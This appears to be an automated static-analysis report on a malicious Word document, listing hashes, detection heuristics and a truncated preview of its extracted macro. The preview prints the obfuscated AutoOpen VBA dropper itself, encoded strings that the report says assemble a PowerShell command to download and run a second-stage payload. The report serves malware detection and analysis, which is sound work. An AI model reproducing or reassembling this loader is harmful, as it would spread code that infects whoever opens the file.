Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c739364981a283ee…

MALICIOUS

Office (OLE)

225.2 KB Created: 2018-07-06 15:09:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 1fe45b8bb97bd71225db1421a6c50b77 SHA-1: 30453913a1d53972f832f6466388b296297b82d6 SHA-256: c739364981a283eefc63a7ec98a1786331e2a16ec4a955fc1a06085ed784e51b
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains an AutoOpen VBA macro that is heavily obfuscated and uses CreateObject and Shell calls. The script attempts to execute a PowerShell command that downloads and executes a payload from a hardcoded URL. This indicates a dropper functionality, aiming to fetch and run a second-stage malicious file.

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6602895-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6602895-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10132 bytes
SHA-256: 50af3048c614677b04578d686ba984725461363c39e6f0b08772f8b5189d0261
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NQNfRZiBH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   SkjAm = (CbXzuN * iGaXD * vEjiz - taczk + (SaiKzW + 74811 - (3133 + nSvAt)))
   VDDCTd = (rLqdK * IlwCbl * wsAbiV - urckCn + (vptSzo + 34077 - (4272 + YiupQ)))
   iQRjL = (wmjIQ * ubiZA * QjZXM - pwNRit + (uzjvnt + 16275 - (61360 + vaJHkK)))
   SDXmCZ = (iGjks * ZdmRc * SYGEkC - ImoiEL + (rJuNtP + 1808 - (56241 + smCIQN)))
   IcIGw = (iLEfu * wjEqi * VNjrf - iTowNF + (iOwJF + 70748 - (44577 + szkjON)))
JVSUvafKHI (UwETdAwpMj + qIbifnQY + VSdkJ + tPLvqV)
   nkkwQ = (rWNVqM * pJfmN * qHDWp - FpiqlM + (ACIXj + 61920 - (95380 + iGhHz)))
   VTcOp = (kRwQb * QkzwdP * BXzFH - cQvHR + (NTZduc + 76375 - (79817 + MsIUvT)))
   WaFwL = (qqwfc * WfFNz * avpQS - irwEI + (MzdZlZ + 31864 - (31494 + jYbwia)))
   XjdihJ = (GjOuXK * MfbJl * AjmwF - nHAVO + (zOSvNC + 58587 - (89177 + wYImI)))
End Sub


Attribute VB_Name = "iqKIjirYFI"
Function UwETdAwpMj()
On Error Resume Next
WpvFvp = WzuOa * OccEn - tJXwX - vTlLJ
BuMYrjS = "wershell " + "    " + "    " + "    " + "     " + "[STR" + "iNg]::JOi" + "N" + Chr(40) + " '' ," + Chr(40) + " " + "'20_" + "124_67>6" + "5!13" + "!94K85>71"
KnurmB = 22873 + 14874 * sOzoA * idlZS - QnKXm + 59012
   QDUaMZ = 11363 + 8943 * NNtiV * cvWpz - lzsXq + 998
jLNALkuXX = "g29T95W8" + "2_90" + "d85K83!68" + "T16_126>8" + "5>68K" + "30!10" + "3>85W"
XIfzWp = 26159 + 38780 * kPbtG * oXIjWa - ORIRzj + 88163
   VYjUz = 50159 + 37053 * rTpUt * bBMkpK - EaDauA + 68083
bVrNY = "82g115!" + "92T89o8" + "5W94T68" + "_11T20" + "T119K6" + "5>66T" + "13i23o" + "88W68d6" + "8o64>10i" + "31i31d7" + "1i71!71>3" + "0W67d88"
zKftBJ = 92033 + 548 * AwhhMJ * pGdFH - ikjSTn + 50045
   hswhot = 15704 + 71711 * shFuSL * alWrz - ZdtOrF + 84423
GBfajmOwd = "T81!94i8" + "7>66!" + "89W92W81" + "_29d85T6" + "7K83o" + "81>64!8" + "5o67" + "K30!8" + "3T95" + "g93T" + "31i4i106"
GSivPY = 18061 + 21481 * lsqBQr * jrCwO - SSbvJi + 80090
HWjRnw = "d6_9" + "o86!8" + "6i124g31T" + "112T88T6" + "8i68_6" + "4g10K" + "31>3" + "1i71i7" + "1d71g30g6" + "7W89i" + "93i82!92"
VWLPtw = 78954 + 55220 * VkkCwz * djMqIm - rdtav + 29626
   zEbPdO = 14620 + 33100 * SbWori * aCEiz - ifzQT + 37720
iXfowSrhdI = "i89>67>6" + "7!89g68_7" + "3_30o8" + "3d95o30!" + "69>91>3" + "1i116!8K" + "74i67>116" + ">124g10" + "2T31" + "g112i"
UwETdAwpMj = BuMYrjS + jLNALkuXX + bVrNY + GBfajmOwd + HWjRnw + iXfowSrhdI
   aawif = 99128 + 90007 * DkaLKX * tPrrP - ZLhiD + 26838
   CWwEKZ = 97327 + 73270 * wPjwOB * fDnjGY - iSTlz + 43221
   nwPlkp = 17196 + 3873 * WjlRjw * NILzZW - fiBAO + 28571
End Function
Function qIbifnQY()
On Error Resume Next
buzcXT = 24503 + 39790 * idmhnn * zHKCN - jjUczv + 51199
   QuUsk = 39064 + 56167 * LLzlnD * JTKSsW - MLOPai + 35299
   IuQmLa = 48675 + 65169 * rjVIi * qMBRvC - RQqkHj + 77808
   tREHbK = 4127 + 42778 * zjdMY * jdDNH - drZoNO + 15510
cRwFlaacL = "88i68" + "!68_" + "64T10i" + "31W31!7" + "1K71" + "T71g30" + "_67K68o9" + "5_94g8" + "5T84T" + "85_6" + "7!89" + "i87_94"
NwPDKk = 40176 + 88584 * zWkmZA * BXZml - TsEZGK + 10332
   bDimJT = 77563 + 64897 * zrBKq * nsfuDp - wYhIi + 39492
dAmlUXPz = "T83_85o94" + "i68!85" + "d66W3" + "0_85W67" + ">31W105" + "K91d" + "2T71_" + "100>8i9_" + "31i1" + "12d88i68_" + "68!64"
dKowKC = 93133 + 57985 * HYurUU * FYLzJi - ithZhv + 15702
   oIjtm = 13566 + 62474 * Swjuh * PXXWH - uGMbf + 42923
wuAlAfE = ">10_31K31" + "d71d71!" + "71_30d67" + "!68o93" + "i92_85!" + "94!85d66g" + "87_73" + "g30g83" + ">95!30o" + "69i91K31T"
OihtHl = 91250 + 84766 * cXpjq * AWkfS - uWmHFI + 40055
   daKcY = 86681 + 66820 * wVAAuE * QUaoqb - SnijFv + 44201
   vcIKi = 68289 + 59311 * liPwN * amZVG - zauYF + 8554
   EiGBtD = 1086 + 43569 * bUiaww * dJCtB - YKiTL + 89930
pDWCNFHDjQ = "122o72W" + "82i121W31" + "W112" + ">88T68" + ">68K" + "64_10"
nIWduO = 11195 + 1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.